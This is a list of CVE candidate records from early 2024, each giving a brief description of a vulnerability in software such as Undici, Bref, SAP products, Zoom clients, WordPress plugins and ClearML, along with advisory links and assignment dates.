CVE 2024 24758 Candidate Undici is an HTTP/1.1 client, written from scratch for Node.js. Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authentication` headers. This issue has been patched in versions 5.28.3 and 6.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/nodejs/undici/commit/b9da3e40f1f096a06b4caedbb27c2568730434ef | URL:https://github.com/nodejs/undici/commit/b9da3e40f1f096a06b4caedbb27c2568730434ef | MISC:https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3 | URL:https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3 Assigned (20240129)
CVE 2024 24757 Candidate open-irs is an issue response robot that reponds to issues in the installed repository. The `.env` file was accidentally uploaded when working with git actions. This problem is fixed in 1.0.1. Discontinuing all sensitive keys and turning into secrets. MISC:https://github.com/Degamisu/open-irs/security/advisories/GHSA-7r69-3vwh-wcfr | URL:https://github.com/Degamisu/open-irs/security/advisories/GHSA-7r69-3vwh-wcfr Assigned (20240129)
CVE 2024 24756 Candidate Crafatar serves Minecraft avatars based on the skin for use in external applications. Files outside of the `lib/public/` directory can be requested from the server. Instances running behind Cloudflare (including crafatar.com) are not affected. Instances using the Docker container as shown in the README are affected, but only files within the container can be read. By default, all of the files within the container can also be found in this repository and are not confidential. This vulnerability is patched in 2.1.5. MISC:https://github.com/crafatar/crafatar/blob/e0233f2899a3206a817d2dd3b80da83d51c7a726/lib/server.js#L64-L67 | URL:https://github.com/crafatar/crafatar/blob/e0233f2899a3206a817d2dd3b80da83d51c7a726/lib/server.js#L64-L67 | MISC:https://github.com/crafatar/crafatar/commit/bba004acc725b362a5d2d5dfe30cf60e7365a373 | URL:https://github.com/crafatar/crafatar/commit/bba004acc725b362a5d2d5dfe30cf60e7365a373 | MISC:https://github.com/crafatar/crafatar/security/advisories/GHSA-5cxq-25mp-q5f2 | URL:https://github.com/crafatar/crafatar/security/advisories/GHSA-5cxq-25mp-q5f2 Assigned (20240129)
CVE 2024 24755 Candidate discourse-group-membership-ip-block is a discourse plugin that adds support for adding users to groups based on their IP address. discourse-group-membership-ip-block was sending all group custom fields to the client, including group custom fields from other plugins which may expect their custom fields to remain secret. MISC:https://github.com/discourse/discourse-group-membership-ip-block/commit/b394d61b0bdfd18a2d8310aa5cf26cccf8bd31c1 | URL:https://github.com/discourse/discourse-group-membership-ip-block/commit/b394d61b0bdfd18a2d8310aa5cf26cccf8bd31c1 | MISC:https://github.com/discourse/discourse-group-membership-ip-block/security/advisories/GHSA-r38c-cp8w-664m | URL:https://github.com/discourse/discourse-group-membership-ip-block/security/advisories/GHSA-r38c-cp8w-664m Assigned (20240129)
CVE 2024 24754 Candidate Bref enable serverless PHP on AWS Lambda. When Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed and its content added in the `$files` or `$parsedBody` arrays. The conversion process produces a different output compared to the one of plain PHP when keys ending with and open square bracket ([) are used. Based on the application logic the difference in the body parsing might lead to vulnerabilities and/or undefined behaviors. This vulnerability is patched in 2.1.13. MISC:https://github.com/brefphp/bref/commit/c77d9f5abf021f29fa96b5720b7b84adbd199092 | URL:https://github.com/brefphp/bref/commit/c77d9f5abf021f29fa96b5720b7b84adbd199092 | MISC:https://github.com/brefphp/bref/security/advisories/GHSA-82vx-mm6r-gg8w | URL:https://github.com/brefphp/bref/security/advisories/GHSA-82vx-mm6r-gg8w Assigned (20240129)
CVE 2024 24753 Candidate Bref enable serverless PHP on AWS Lambda. When Bref is used in combination with an API Gateway with the v2 format, it does not handle multiple values headers. If PHP generates a response with two headers having the same key but different values only the latest one is kept. If an application relies on multiple headers with the same key being set for security reasons, then Bref would lower the application security. For example, if an application sets multiple `Content-Security-Policy` headers, then Bref would just reflect the latest one. This vulnerability is patched in 2.1.13. MISC:https://github.com/brefphp/bref/commit/f834027aaf88b3885f4aa8edf6944ae920daf2dc | URL:https://github.com/brefphp/bref/commit/f834027aaf88b3885f4aa8edf6944ae920daf2dc | MISC:https://github.com/brefphp/bref/security/advisories/GHSA-99f9-gv72-fw9r | URL:https://github.com/brefphp/bref/security/advisories/GHSA-99f9-gv72-fw9r Assigned (20240129)
CVE 2024 24752 Candidate Bref enable serverless PHP on AWS Lambda. When Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed and for each which contains a file, it is extracted and saved in `/tmp` with a random filename starting with `bref_upload_`. The flow mimics what plain PHP does but it does not delete the temporary files when the request has been processed. An attacker could fill the Lambda instance disk by performing multiple MultiPart requests containing files. This vulnerability is patched in 2.1.13. MISC:https://github.com/brefphp/bref/commit/350788de12880b6fd64c4c318ba995388bec840e | URL:https://github.com/brefphp/bref/commit/350788de12880b6fd64c4c318ba995388bec840e | MISC:https://github.com/brefphp/bref/security/advisories/GHSA-x4hh-frx8-98r5 | URL:https://github.com/brefphp/bref/security/advisories/GHSA-x4hh-frx8-98r5 Assigned (20240129)
CVE 2024 24751 Candidate sf_event_mgt is an event management and registration extension for the TYPO3 CMS based on ExtBase and Fluid. In affected versions the existing access control check for events in the backend module got broken during the update of the extension to TYPO3 12.4, because the `RedirectResponse` from the `$this->redirect()` function was never handled. This issue has been addressed in version 7.4.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/derhansen/sf_event_mgt/commit/a08c2cd48695c07e462d15eeb70434ddc0206e4c | URL:https://github.com/derhansen/sf_event_mgt/commit/a08c2cd48695c07e462d15eeb70434ddc0206e4c | MISC:https://github.com/derhansen/sf_event_mgt/security/advisories/GHSA-4576-pgh2-g34j | URL:https://github.com/derhansen/sf_event_mgt/security/advisories/GHSA-4576-pgh2-g34j Assigned (20240129)
CVE 2024 24750 Candidate Undici is an HTTP/1.1 client, written from scratch for Node.js. In affected versions calling `fetch(url)` and not consuming the incoming body ((or consuming it very slowing) will lead to a memory leak. This issue has been addressed in version 6.6.1. Users are advised to upgrade. Users unable to upgrade should make sure to always consume the incoming body. MISC:https://github.com/nodejs/undici/commit/87a48113f1f68f60aa09abb07276d7c35467c663 | URL:https://github.com/nodejs/undici/commit/87a48113f1f68f60aa09abb07276d7c35467c663 | MISC:https://github.com/nodejs/undici/security/advisories/GHSA-9f24-jqhm-jfcw | URL:https://github.com/nodejs/undici/security/advisories/GHSA-9f24-jqhm-jfcw Assigned (20240129)
CVE 2024 24748 Candidate Discourse is an open source platform for community discussion. In affected versions an attacker can learn that a secret subcategory exists under a public category which has no public subcategories. The issue is patched in the latest stable, beta and tests-passed version of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/discourse/discourse/commit/819361ba28f86a1347059af300bb5cca690f9193 | URL:https://github.com/discourse/discourse/commit/819361ba28f86a1347059af300bb5cca690f9193 | MISC:https://github.com/discourse/discourse/security/advisories/GHSA-3qh8-xw23-cq4x | URL:https://github.com/discourse/discourse/security/advisories/GHSA-3qh8-xw23-cq4x Assigned (20240129)
CVE 2024 24747 Candidate MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z. MISC:https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776 | URL:https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776 | MISC:https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z | URL:https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z | MISC:https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4 | URL:https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4 Assigned (20240129)
CVE 2024 24743 Candidate SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected. MISC:https://me.sap.com/notes/3426111 | URL:https://me.sap.com/notes/3426111 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240129)
CVE 2024 24742 Candidate SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability. MISC:https://me.sap.com/notes/3158455 | URL:https://me.sap.com/notes/3158455 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240129)
CVE 2024 24741 Candidate SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information but no impact to integrity and availability. MISC:https://me.sap.com/notes/2897391 | URL:https://me.sap.com/notes/2897391 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240129)
CVE 2024 24740 Candidate SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application. MISC:https://me.sap.com/notes/3360827 | URL:https://me.sap.com/notes/3360827 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240129)
CVE 2024 2474 Candidate The Standout Color Boxes and Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'color-button' shortcode in all versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/standout-color-boxes-and-buttons/ | URL:https://wordpress.org/plugins/standout-color-boxes-and-buttons/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve Assigned (20240314)
CVE 2024 24739 Candidate SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application. MISC:https://me.sap.com/notes/2637727 | URL:https://me.sap.com/notes/2637727 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240129)
CVE 2024 24736 Candidate The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558. MISC:https://packetstormsecurity.com/files/176784/YahooPOPs-1.6-Denial-Of-Service.html Assigned (20240129)
CVE 2024 24725 Candidate Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI. MISC:https://gibbonedu.org/download/ | MISC:https://www.exploit-db.com/exploits/51903 Assigned (20240127)
CVE 2024 24722 Candidate An unquoted service path vulnerability in the 12d Synergy Server and File Replication Server components may allow an attacker to gain elevated privileges via the 12d Synergy Server and/or 12d Synergy File Replication Server executable service path. This is fixed in 4.3.10.192, 5.1.5.221, and 5.1.6.235. CONFIRM:https://help.12dsynergy.com/v1/docs/cve-2024-24722 | MISC:https://files.12dsynergy.com/downloads/download.aspx | MISC:https://www.12dsynergy.com/security-statement/ Assigned (20240127)
CVE 2024 24721 Candidate An issue was discovered on Innovaphone PBX before 14r1 devices. The password form, used to authenticate, allows a Brute Force Attack through which an attacker may be able to access the administration panel MISC:https://excellium-services.com/cert-xlm-advisory/CVE-2024-24721 Assigned (20240127)
CVE 2024 24720 Candidate An issue was discovered on Innovaphone PBX before 14r1 devices. It provides different responses to incoming requests in a way that reveals information to an attacker. MISC:https://excellium-services.com/cert-xlm-advisory/CVE-2024-24720 Assigned (20240127)
CVE 2024 24719 Candidate Missing Authorization vulnerability in Uriahs Victor Location Picker at Checkout for WooCommerce.This issue affects Location Picker at Checkout for WooCommerce: from n/a through 1.8.9. MISC:https://patchstack.com/database/vulnerability/map-location-picker-at-checkout-for-woocommerce/wordpress-kikote-plugin-1-8-9-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/map-location-picker-at-checkout-for-woocommerce/wordpress-kikote-plugin-1-8-9-broken-access-control-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24718 Candidate Missing Authorization vulnerability in PropertyHive.This issue affects PropertyHive: from n/a through 2.0.6. MISC:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-6-missing-authorization-to-non-arbitrary-plugin-installation-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-6-missing-authorization-to-non-arbitrary-plugin-installation-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24717 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mark Kinchin Beds24 Online Booking allows Stored XSS.This issue affects Beds24 Online Booking: from n/a through 2.0.23. MISC:https://patchstack.com/database/vulnerability/beds24-online-booking/wordpress-beds24-online-booking-plugin-2-0-23-admin-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/beds24-online-booking/wordpress-beds24-online-booking-plugin-2-0-23-admin-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24714 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in bPlugins LLC Icons Font Loader.This issue affects Icons Font Loader: from n/a through 1.1.4. MISC:https://patchstack.com/database/vulnerability/icons-font-loader/wordpress-icons-font-loader-plugin-1-1-4-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/icons-font-loader/wordpress-icons-font-loader-plugin-1-1-4-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24713 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Auto Listings Auto Listings – Car Listings & Car Dealership Plugin for WordPress allows Stored XSS.This issue affects Auto Listings – Car Listings & Car Dealership Plugin for WordPress: from n/a through 2.6.5. MISC:https://patchstack.com/database/vulnerability/auto-listings/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/auto-listings/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24712 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team Heateor Heateor Social Login WordPress allows Stored XSS.This issue affects Heateor Social Login WordPress: from n/a through 1.1.30. MISC:https://patchstack.com/database/vulnerability/heateor-social-login/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/heateor-social-login/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24711 Candidate Missing Authorization vulnerability in weDevs WooCommerce Conversion Tracking.This issue affects WooCommerce Conversion Tracking: from n/a through 2.0.11. MISC:https://patchstack.com/database/vulnerability/woocommerce-conversion-tracking/wordpress-woocommerce-conversion-tracking-plugin-2-0-11-broken-access-control-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woocommerce-conversion-tracking/wordpress-woocommerce-conversion-tracking-plugin-2-0-11-broken-access-control-csrf-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24708 Candidate Cross-Site Request Forgery (CSRF) vulnerability in W3speedster W3SPEEDSTER.This issue affects W3SPEEDSTER: from n/a through 7.19. MISC:https://patchstack.com/database/vulnerability/w3speedster-wp/wordpress-w3speedster-plugin-7-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/w3speedster-wp/wordpress-w3speedster-plugin-7-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24706 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Forum One WP-CFM wp-cfm.This issue affects WP-CFM: from n/a through 1.7.8. MISC:https://github.com/forumone/wp-cfm/security/advisories/GHSA-2449-jmfc-gc7f | URL:https://github.com/forumone/wp-cfm/security/advisories/GHSA-2449-jmfc-gc7f | MISC:https://patchstack.com/database/vulnerability/wp-cfm/wordpress-wp-cfm-plugin-1-7-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-cfm/wordpress-wp-cfm-plugin-1-7-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24705 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Octa Code Accessibility.This issue affects Accessibility: from n/a through 1.0.6. MISC:https://patchstack.com/database/vulnerability/accessibility/wordpress-accessibility-plugin-1-0-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/accessibility/wordpress-accessibility-plugin-1-0-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24702 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Matt Martz & Andy Stratton Page Restrict.This issue affects Page Restrict: from n/a through 2.5.5. MISC:https://patchstack.com/database/vulnerability/pagerestrict/wordpress-page-restrict-plugin-2-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pagerestrict/wordpress-page-restrict-plugin-2-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24701 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Native Grid LLC A no-code page builder for beautiful performance-based content.This issue affects A no-code page builder for beautiful performance-based content: from n/a through 2.1.20. MISC:https://patchstack.com/database/vulnerability/setka-editor/wordpress-setka-editor-plugin-2-1-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/setka-editor/wordpress-setka-editor-plugin-2-1-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240126)
CVE 2024 24699 Candidate Business logic error in some Zoom clients may allow an authenticated user to conduct information disclosure via network access. MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24006/ | URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24006/ Assigned (20240126)
CVE 2024 24698 Candidate Improper authentication in some Zoom clients may allow a privileged user to conduct a disclosure of information via local access. MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24005/ | URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24005/ Assigned (20240126)
CVE 2024 24697 Candidate Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access. MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24004/ | URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24004/ Assigned (20240126)
CVE 2024 24696 Candidate Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an authenticated user to conduct a disclosure of information via network access. MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24003/ | URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24003/ Assigned (20240126)
CVE 2024 24693 Candidate Improper access control in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access. MISC:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/ | URL:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/ Assigned (20240126)
CVE 2024 24692 Candidate Race condition in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access. MISC:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/ | URL:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/ Assigned (20240126)
CVE 2024 24691 Candidate Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an escalation of privilege via network access. MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24008/ | URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24008/ Assigned (20240126)
CVE 2024 24690 Candidate Improper input validation in some Zoom clients may allow an authenticated user to conduct a denial of service via network access. MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24007/ | URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24007/ Assigned (20240126)
CVE 2024 2469 Candidate An attacker with an Administrator role in GitHub Enterprise Server could gain SSH root access via remote code execution. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.17, 3.9.12, 3.10.9, 3.11.7 and 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7 | MISC:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1 | URL:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12 Assigned (20240314)
CVE 2024 24683 Candidate Improper Input Validation vulnerability in Apache Hop Engine.This issue affects Apache Hop Engine: before 2.8.0. Users are recommended to upgrade to version 2.8.0, which fixes the issue. When Hop Server writes links to the PrepareExecutionPipelineServlet page one of the parameters provided to the user was not properly escaped. The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines making the risk of exploiting this low. This issue only affects users using the Hop Server component and does not directly affect the client. MISC:https://lists.apache.org/thread/ts203zssv1n9qth1wdlhk2bhos3vcq6t | URL:https://lists.apache.org/thread/ts203zssv1n9qth1wdlhk2bhos3vcq6t Assigned (20240126)
CVE 2024 24681 Candidate Insecure AES key in Yealink Configuration Encrypt Tool below verrsion 1.2. A single, vendorwide, hardcoded AES key in the configuration tool used to encrypt provisioning documents was leaked leading to a compromise of confidentiality of provisioning documents. MISC:https://www.reddit.com/r/VOIP/comments/ys9mel/what_are_some_of_the_good_white_label_voip/ Assigned (20240126)
CVE 2024 24680 Candidate An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings. MISC:https://docs.djangoproject.com/en/5.0/releases/security/ | MISC:https://groups.google.com/forum/#!forum/django-announce | MISC:https://www.djangoproject.com/weblog/2024/feb/06/security-releases/ Assigned (20240126)
CVE 2024 2468 Candidate The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress widget 'embedpress_pro_twitch_theme ' attribute in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve Assigned (20240314)
CVE 2024 2465 Candidate Open redirection vulnerability in CDeX application allows to redirect users to arbitrary websites via a specially crafted URL.This issue affects CDeX application versions through 5.7.1. MISC:https://cdex.cloud/ | URL:https://cdex.cloud/ | MISC:https://cert.pl/en/posts/2024/03/CVE-2024-2463/ | URL:https://cert.pl/en/posts/2024/03/CVE-2024-2463/ | MISC:https://cert.pl/posts/2024/03/CVE-2024-2463/ | URL:https://cert.pl/posts/2024/03/CVE-2024-2463/ Assigned (20240314)
CVE 2024 2464 Candidate This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.This issue affects CDeX application versions through 5.7.1. MISC:https://cdex.cloud/ | URL:https://cdex.cloud/ | MISC:https://cert.pl/en/posts/2024/03/CVE-2024-2463/ | URL:https://cert.pl/en/posts/2024/03/CVE-2024-2463/ | MISC:https://cert.pl/posts/2024/03/CVE-2024-2463/ | URL:https://cert.pl/posts/2024/03/CVE-2024-2463/ Assigned (20240314)
CVE 2024 2463 Candidate Weak password recovery mechanism in CDeX application allows to retrieve password reset token.This issue affects CDeX application versions through 5.7.1. MISC:https://cdex.cloud/ | URL:https://cdex.cloud/ | MISC:https://cert.pl/en/posts/2024/03/CVE-2024-2463/ | URL:https://cert.pl/en/posts/2024/03/CVE-2024-2463/ | MISC:https://cert.pl/posts/2024/03/CVE-2024-2463/ | URL:https://cert.pl/posts/2024/03/CVE-2024-2463/ Assigned (20240314)
CVE 2024 2460 Candidate The GamiPress – Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gamipress_button' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve Assigned (20240314)
CVE 2024 24595 Candidate Allegro AI’s open-source version of ClearML stores passwords in plaintext within the MongoDB instance, resulting in a compromised server leaking all user emails and passwords. MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ | URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ Assigned (20240125)
CVE 2024 24594 Candidate A cross-site scripting (XSS) vulnerability in all versions of the web server component of Allegro AI’s ClearML platform allows a remote attacker to execute a JavaScript payload when a user views the Debug Samples tab in the web UI. MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ | URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ Assigned (20240125)
CVE 2024 24593 Candidate A cross-site request forgery (CSRF) vulnerability in all versions up to 1.14.1 of the api server component of Allegro AI’s ClearML platform allows a remote attacker to impersonate a user by sending API requests via maliciously crafted html. Exploitation of the vulnerability allows an attacker to compromise confidential workspaces and files, leak sensitive information, and target instances of the ClearML platform within closed off networks. MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ | URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ Assigned (20240125)
CVE 2024 24592 Candidate Lack of authentication in all versions of the fileserver component of Allegro AI’s ClearML platform allows a remote attacker to arbitrarily access, create, modify and delete files. MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ | URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/ Assigned (20240125)
